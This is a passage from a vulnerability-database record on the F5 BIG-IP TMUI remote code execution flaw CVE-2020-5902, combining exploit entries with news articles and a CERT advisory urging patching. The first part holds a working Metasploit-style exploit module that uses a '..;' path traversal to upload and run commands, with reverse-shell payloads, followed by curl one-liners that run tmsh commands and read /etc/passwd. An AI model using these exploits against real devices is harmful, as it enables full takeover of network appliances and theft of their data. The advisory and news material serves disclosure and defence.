'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Unix Command',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\r\n }\r\n ],\r\n [\r\n 'Linux Dropper',\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper,\r\n 'DefaultOptions' => {\r\n 'CMDSTAGER::FLAVOR' => :bourne,\r\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'SSL' => true,\r\n 'WfsDelay' => 5\r\n },\r\n 'Notes' => {\r\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service\r\n 'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky\r\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])\r\n ])\r\n\r\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\r\n import_target_defaults\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'),\r\n 'vars_post' => {\r\n 'fileName' => '/etc/f5-release'\r\n }\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Target did not respond to check request.')\r\n end\r\n\r\n unless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body\r\n return CheckCode::Safe('Target did not respond with BIG-IP version.')\r\n end\r\n\r\n # If we got here, the directory traversal was successful\r\n CheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\")\r\n end\r\n\r\n def exploit\r\n create_alias\r\n\r\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\r\n\r\n case target['Type']\r\n when :unix_cmd\r\n execute_command(payload.encoded)\r\n when :linux_dropper\r\n execute_cmdstager\r\n end\r\n\r\n delete_alias if @created_alias\r\n end\r\n\r\n def create_alias\r\n print_status('Creating alias list=bash')\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\r\n 'vars_post' => {\r\n 'command' => 'create cli alias private list command bash'\r\n }\r\n )\r\n\r\n unless res && res.code == 200 && res.get_json_document['error'].blank?\r\n fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')\r\n end\r\n\r\n @created_alias = true\r\n\r\n print_good('Successfully created alias list=bash')\r\n end\r\n\r\n def execute_command(cmd, _opts = {})\r\n vprint_status(\"Executing command: #{cmd}\")\r\n\r\n upload_script(cmd)\r\n execute_script\r\n end\r\n\r\n def upload_script(cmd)\r\n print_status(\"Uploading #{script_path}\")\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'),\r\n 'vars_post' => {\r\n 'fileName' => script_path,\r\n 'content' => cmd\r\n }\r\n )\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload #{script_path}\")\r\n end\r\n\r\n register_file_for_cleanup(script_path)\r\n\r\n print_good(\"Successfully uploaded #{script_path}\")\r\n end\r\n\r\n def execute_script\r\n print_status(\"Executing #{script_path}\")\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\r\n 'vars_post' => {\r\n 'command' => \"list #{script_path}\"\r\n }\r\n }, 3.5)\r\n end\r\n\r\n def delete_alias\r\n print_status('Deleting alias list=bash')\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\r\n 'vars_post' => {\r\n 'command' => 'delete cli alias private list'\r\n }\r\n )\r\n\r\n unless res && res.code == 200 && res.get_json_document['error'].blank?\r\n print_warning('Failed to delete alias list=bash')\r\n return\r\n end\r\n\r\n print_good('Successfully deleted alias list=bash')\r\n end\r\n\r\n def dir_trav(path)\r\n # PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\">\r\n normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path)\r\n end\r\n\r\n def script_path\r\n @script_path ||=\r\n normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))\r\n end\r\n\r\nend\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34652"}, {"lastseen": "2020-07-20T04:49:16", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category web applications", "modified": "2020-07-07T00:00:00", "published": "2020-07-07T00:00:00", "id": "1337DAY-ID-34647", "href": "https://0day.today/exploit/description/34647", "title": "BIG-IP 15.0.0 < 15.1.0.3 - Traffic Management User Interface (TMUI) Remote Code Execution (2)", "type": "zdt", "sourceData": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution\r\n\r\n## RCE: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\r\n\r\n## Read File: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'\n\n# 0day.today [2020-07-20] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34647"}], "thn": [{"lastseen": "2020-07-15T20:25:46", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-ESCkWH_hGFA/XwCORuHyklI/AAAAAAAA2_Y/8xaEkL1aRAsnYdpCaEIFxLgvuBwf2BtkQCLcBGAsYHQ/s728-e100/f5-big-ip-application-security.jpg>)\n\n \nCybersecurity researchers today issued a security advisory warning enterprises and governments across the globe to immediately patch a highly-critical remote code execution vulnerability affecting F5's BIG-IP networking devices running application security servers. \n \nThe vulnerability, assigned [CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) and rated as critical with a CVSS score of 10 out of 10, could let remote attackers take complete control of the targeted systems, eventually gaining surveillance over the application data they manage. \n\n\n \nAccording to Mikhail Klyuchnikov, a security researcher at Positive Technologies who discovered the flaw and reported it to F5 Networks, the issue resides in a configuration utility called Traffic Management User Interface (TMUI) for BIG-IP application delivery controller (ADC). \n \nBIG-IP ADC is being used by large enterprises, data centers, and cloud computing environments, allowing them to implement application acceleration, load balancing, rate shaping, SSL offloading, and web application firewall. \n \n\n\n## F5 BIG-IP ADC RCE Flaw (CVE-2020-5902)\n\n \nAn unauthenticated attacker can remotely exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration. \n \nSuccessful exploitation of this vulnerability could allow attackers to gain full admin control over the device, eventually making them do any task they want on the compromised device without any authorization. \n \n\n\n[](<https://thehackernews.com/images/-mSgD9hYm9iE/XwCPk5rodoI/AAAAAAAA2_k/Jk-64lba4o0OYBTI-vkgZlYW_MAMyckeQCLcBGAsYHQ/s728-e100/f5-big-ip-application.jpg>)\n\n \n\"The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,\" [Klyuchnikov said](<https://swarm.ptsecurity.com/rce-in-f5-big-ip/>). \n \n\"RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation.\" \n \nAs of June 2020, more than 8,000 devices have been identified online as being exposed directly to the internet, of which 40% reside in the United States, 16% in China, 3% in Taiwan, 2.5% in Canada and Indonesia and less than 1% in Russia, the security firm says. \n\n\n \nHowever, Klyuchnikov also says that most companies using the affected product do not enable access to the internet's vulnerable configuration interface. \n \n\n\n## F5 BIG-IP ADC XSS Flaw (CVE-2020-5903)\n\n \nBesides this, Klyuchnikov also reported an XSS vulnerability (assigned [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>) with a CVSS score of 7.5) in the BIG-IP configuration interface that could let remote attackers run malicious JavaScript code as the logged-in administrator user. \n \n\"If the user has administrator privileges and access to Advanced Shell (bash), successful exploitation can lead to a full compromise of BIG-IP via RCE,\" the researcher said. \n \n\n\n## Affected Versions and Patch Updates\n\n \nAffected companies and administrators relying on vulnerable BIG-IP versions 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x are strongly recommended to update their devices to the latest versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4 as soon as possible. \n \nMoreover, users of public cloud marketplaces like AWS (Amazon Web Services), Azure, GCP, and Alibaba are also advised to switch to BIG-IP Virtual Edition (VE) versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.0.1.4, or 15.1.0.4, as soon as they are available. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2020-07-15T18:43:21", "published": "2020-07-04T14:20:00", "id": "THN:02088F21DB6E2D58FA2FBFDB5C735108", "href": "https://thehackernews.com/2020/07/f5-big-ip-application-security.html", "type": "thn", "title": "Critical RCE Flaw Affects F5 BIG-IP Application Security Servers", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-07-07T08:22:20", "bulletinFamily": "info", "description": "Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks\u2019 networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.\n\nLast week, F5 Networks issued urgent patches for the critical remote code-execution flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company\u2019s BIG-IP app delivery controllers, which are used for various networking functions, including app-security management and load-balancing. Despite a patch being available, Shodan [shows](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) almost 8,500 vulnerable devices are still available on the internet.\n\nNot long after the flaw was disclosed, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers and ultimately active exploits. Researchers warn that they\u2019ve seen attackers targeting the flaw over the weekend for various malicious activities, including launching [Mirai variant DvrHelper](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), deploying cryptocurrency mining malware and [scraping credentials](<https://twitter.com/GossiTheDog/status/1279856862888898568>) \u201cin an automated fashion.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nRich Warren, principal security consultant for NCC Group, [said Monday on Twitter](<https://twitter.com/buffaloverflow/status/1279384540847489024>) that \u201cas of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python.\u201d\n\n> Ok, we are seeing active exploitation of CVE-2020-5902\n> \n> Patch it today\n> \n> \u2014 Rich Warren (@buffaloverflow) [July 4, 2020](<https://twitter.com/buffaloverflow/status/1279384540847489024?ref_src=twsrc%5Etfw>)\n\nThe exploit of the flaw is trivial: Mikhail Klyuchnikov with Positive Technologies, [who originally discovered the flaw](<https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/>), said that in order to exploit the vulnerability, an unauthenticated attacker would only need to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.\n\n\u201cBy exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE1),\u201d Klyuchnikov said. \u201cThe attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network.\u201d\n\n[Vulnerable versions of BIG-IP (](<https://support.f5.com/csp/article/K52145254>)11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated to the corresponding fixed versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4), he said.\n\nAs more active exploits are detected in the wild, [F5 Networks](<https://twitter.com/F5Networks/status/1279022116868960257>), the [U.S. Cyber Command](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) and [Chris Krebs](<https://twitter.com/CISAKrebs/status/1279939623062581251>), director at the U.S. Cybersecurity and Infrastructure Security Agency (CISA), have all urged administrators to implement the offered fixes as soon as possible.\n\nAnother flaw was also fixed last week in BIG-IP that could allow an authenticated attacker to launch cross-site scripting attacks. The flaw ([CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>)) allows attackers to run malicious JavaScript code as a logged-in user.\n\nF5 Networks previously [dealt with security issues](<https://threatpost.com/authentication-bypass-bug-enterprise-vpns/143781/>) in 2019 when its VPN app (as well as ones built by Cisco, Palo Alto Networks and Pulse Secure) was discovered to improperly store authentication tokens and session cookies without encryption on a user\u2019s computer.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-07-06T19:06:20", "published": "2020-07-06T19:06:20", "id": "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "href": "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "type": "threatpost", "title": "Admins Urged to Patch Critical F5 Flaw Under Active Attack", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-17T21:04:49", "bulletinFamily": "info", "description": "About 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices are still vulnerable to full system access and remote code-execution (RCE), despite a patch for a critical flaw being available for two weeks.\n\nThe BIG-IP family consists of application delivery controllers, Local Traffic Managers (LTMs) and domain name system (DNS) managers, together offering built-in security, traffic management and performance application services for private data centers or in the cloud.\n\nAt the end of June, F5 issued urgent patches for a critical RCE flaw ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), which is present in the Traffic Management User Interface (TMUI) of the company\u2019s BIG-IP app delivery controllers. The bug has a CVSS severity score of 10 out of 10, and at the time of disclosure, Shodan [showed](<https://twitter.com/GossiTheDog/status/1279005317821497344/photo/1>) that there were almost 8,500 vulnerable devices exposed on the internet.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nShortly after disclosure, public exploits [were made](<https://twitter.com/wugeej/status/1280008779359125504?s=20>) available for it, leading to mass scanning for [vulnerable devices ](<https://twitter.com/bad_packets/status/1279884302990237696?s=20>)by attackers, and ultimately active exploits.\n\n\u201cCVE-2020-5902 received the highest vulnerability rating of critical from the National Vulnerability Database due to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d Expanse researchers noted in [an advisory](<http://expanse.co/blog/expanse-researchers-show-more-than-8,000-f5-big-ip-tmuis-are-still-exposed-on-the-internet>) issued on Friday. \u201cIt was deemed so critical that U.S. Cyber Command [issued a tweet](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) on the afternoon of July 3, recommending immediate patching despite the holiday weekend. While F5 did not release a proof of concept (PoC) for the exploit, numerous PoCs began appearing on July 5.\u201d\n\nFast-forward to two weeks later, and patches have rolled out to less than 500 of that original group of vulnerable machines, according to the analysis. Expanse researchers said that as of July 15, there were at least 8,041 vulnerable TMUI instances still exposed to the public internet.\n\nThe stakes are high, as one would expect from a critical-rated bug: \u201cThe vulnerability CVE-2020-5902 allows for the execution of arbitrary system commands on vulnerable BIG-IP devices with an exposed and accessible management port via the TMUI,\u201d explained the researchers. \u201cThis vulnerability could provide complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serve as a hop point into other areas of the network.\u201d\n\nTo boot, an additional bug, [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>), affects the same vulnerable management interface via a cross-site scripting vulnerability (XSS) that Expanse said could also be leveraged to include RCE.\n\nDespite active exploits and security experts urging companies to deploy the urgent patch for the critical vulnerability, patching is clearly going slowly \u2013 something that Tim Junio, CEO and co-founder of Expanse, chalks up to a lack of visibility.\n\n\u201cPatching is likely proceeding slowly because organizations may not know that they have these TMUIs,\u201d Junio told Threatpost. \u201cIf they are unaware of their complete inventory of internet-connected systems and services, they will not have well-defined processes for patching them. Security teams are also often stretched thin and that can result in delays in patching, even for critical items like this.\u201d\n\nJunio also told Threatpost that if a malicious actor gained this type of remote access it could be catastrophic \u2013 and yet the bug carries an ease of exploitation that he likens to a Jedi mind trick.\n\n\u201cAn attacker just needs to send the firewall a set of commands, which are now publicly known, in order to take over the firewall,\u201d he explained. \u201cA physical world analogy: If a firewall is a bit like a guard and a gate at the entrance of a facility that is surrounded by walls, this exploit is like a Jedi mind trick whereby an attacker can walk right up to the guard, suggest to the guard they leave their post and give the attacker a guard uniform and all keys to the gate \u2013 and _the guard will say yes_.\u201d\n\nThe attacker can then carry out all sorts of different nefarious activities in the context of a privileged user.\n\nJunio explained, continuing his analogy, \u201cIn other words, the attacker can now walk into the facility unimpeded (unauthorized access); bring sensitive data and objects out of the facility unimpeded (exfiltration); and can close the gate to legitimate people trying to enter the facility (denial of service); among many other actions.\u201d\n\nThe TMUI is responsible for configuration, and Junio noted that there\u2019s generally no reason for it to be exposed to the internet \u2013 so, a simple interim mitigation (albeit not a full one) in lieu of patching would be to remove it from public view.\n\n\u201cThis is a very concerning number of exposed TMUIs on the internet,\u201d said Junio. \u201cA hack of a major enterprise via this type of attack vector could be very damaging to that organization.\u201d\n\nHe added that he believes that an attack on any number of enterprises could go so far as to be harmful to the global economy.\n\n\u201cActual day-to-day users of F5 equipment are generally going to be security operations, network operations or infrastructure professionals,\u201d said Junio. \u201cBigger picture, the customers/buyers of this technology are some of the world\u2019s largest enterprises and government agencies.\u201d These include 48 out of the Fortune 50, he added, though he\u2019s not aware which, if any, of these specific installations are vulnerable to attack.\n", "modified": "2020-07-17T20:59:33", "published": "2020-07-17T20:59:33", "id": "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "href": "https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/", "type": "threatpost", "title": "Thousands of Vulnerable F5 BIG-IP Users Still Open to Takeover", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-07-13T15:58:26", "bulletinFamily": "info", "description": "### Overview\n\nF5 BIG-IP provides a Traffic Management User Interface (TMUI), also referred to as the Configuration utility, that has multiple vulnerabilities including a remotely exploitable [command injection](<https://cwe.mitre.org/data/definitions/74.html>) vulnerability that can be used to execute arbitrary commands and subsequently take control of a vulnerable system.\n\n### Description\n\nF5 BIG-IP devices provide load-balancing capability to application services such as HTTP and DNS. The F5 BIG-IP TMUI management web interface improperly neutralizes untrusted user input and can be abused by unauthenticated remote attackers to perform malicious activities such as cross-site scripting (XSS), cross-site request forgery (CSRF), and command injection [CWE-74](<https://cwe.mitre.org/data/definitions/74.html>). F5 has also announced that BIG-IP devices do not properly enforce access controls to sensitive configuration files that be read and overwritten by an authenticated user via Secure Copy (SCP). The vulnerability identified by CVE-2020-0592 can be abused to achieve arbitrary code execution on the target device with root privileges.\n\nUnderlying causes and factors in these vulnerabilities include:\n\n * Improper configuration and a lack of identify checks, see recent article from NCC Group. [Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://research.nccgroup.com/2020/07/12/understanding-the-root-cause-of-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902/>)\n * The TMUI fails to enforce proper authentication and authorization, see [OWASP Recommendations](<https://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html>)\n * The TMUI web interface does not normalize user's input to prevent both XSS and CSRF, allowing a [\"Deadly Combinations of XSS and CSRF\"](<https://owasp.org/www-pdf-archive/OTD2011-SK.pdf>)\n * Lack of role-based access checks allows for for unexpected file access, see [Role-Based Access Control Models](<https://csrc.nist.gov/CSRC/media/Projects/Role-Based-Access-Control/documents/sandhu96.pdf>)\n\nF5 recommends that the TMUI web interface should be accessible only from a secure or an out-of-band network and not directly from the Internet ([K13092](<https://support.f5.com/csp/article/K13092>)). However, many installations, as observed by [Bad Packets](<https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/>), do not seem to follow this recommendation.\n\n### Impact\n\nAn unauthenticated attacker with network access to the TMUI may be able to execute arbitrary system commands, create or delete files, disable services, and subsequently execute arbitrary code with high privileges such as root. An authenticated user is also be able to perform unexpected activities such as changing configuration files on a vulnerable device.\n\n### Solution\n\n#### Apply updates\n\nF5 has provided updated software for the several impacted versions of BIG-IP devices. Note that BIG-IP appliances as well as virtual instances are also vulnerable as identified by F5 advisories. It is highly recommended that you upgrade to the latest secure and stable software provided by F5. These updates are essential to your device's security, even if the TMUI is not accessible over the Internet. The upgrade reduces the risk to your device being compromised using CSRF or XSS attacks.\n\n#### Workarounds\n\nIn many cases, an attack against BIG-IP's recent vulnerabilities require access to TMUI. Blocking or disabling access to TMUI from untrusted networks is highly recommended. F5 has also provided multiple temporary workaround options in their advisory.\n\n### Acknowledgements\n\nSeveral of these vulnerabilities were reported by Mikhail Klyuchnikov of Positive Technologies, who worked with F5 on a coordinated disclosure.\n\nThis document was written by Vijay Sarvepalli.\n\n### Vendor Information \n\n290915\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### F5 Networks Inc. __ Affected\n\nUpdated: 2020-07-08 **CVE-2020-5902**| Affected \n---|--- \n**CVE-2020-5903**| Affected \n**CVE-2020-5904**| Affected \n**CVE-2020-5905**| Affected \n**CVE-2020-5906**| Affected \n**CVE-2020-5907**| Affected \n**CVE-2020-5908**| Affected \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n**References**\n\n * <https://support.f5.com/csp/article/K52145254>\n * <https://support.f5.com/csp/article/K43638305>\n * <https://support.f5.com/csp/article/K31301245>\n * <https://support.f5.com/csp/article/K07051153>\n * <https://support.f5.com/csp/article/K82518062>\n * <https://support.f5.com/csp/article/K00091341>\n * <https://support.f5.com/csp/article/K33023560>\n\n#### CERT Addendum\n\nPlease see recent advisories provided by F5 to address these vulnerabilities.\n\n \n\n\n### References \n\n * <https://support.f5.com/csp/article/K52145254>\n * <https://support.f5.com/csp/article/K43638305>\n * <https://support.f5.com/csp/article/K31301245>\n * <https://support.f5.com/csp/article/K07051153>\n * <https://support.f5.com/csp/article/K82518062>\n * <https://support.f5.com/csp/article/K00091341>\n * <https://support.f5.com/csp/article/K33023560>\n * <https://github.com/yassineaboukir/CVE-2020-5902>\n * <https://research.nccgroup.com/2020/07/12/understanding-the-root-cause-of-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902/>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-5902 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5902>) [CVE-2020-5903 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5903>) [CVE-2020-5904 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5904>) [CVE-2020-5905 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5905>) [CVE-2020-5906 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5906>) [CVE-2020-5907 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5907>) [CVE-2020-5908 ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=2020-5908>) \n---|--- \n**Date Public:** | 2020-07-08 \n**Date First Published:** | 2020-07-08 \n**Date Last Updated: ** | 2020-07-13 14:00 UTC \n**Document Revision: ** | 2 \n", "modified": "2020-07-13T14:00:00", "published": "2020-07-08T00:00:00", "id": "VU:290915", "href": "https://www.kb.cert.org/vuls/id/290915", "type": "cert", "title": "F5 BIG-IP contains multiple vulnerabilities including unauthenticated remote command execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}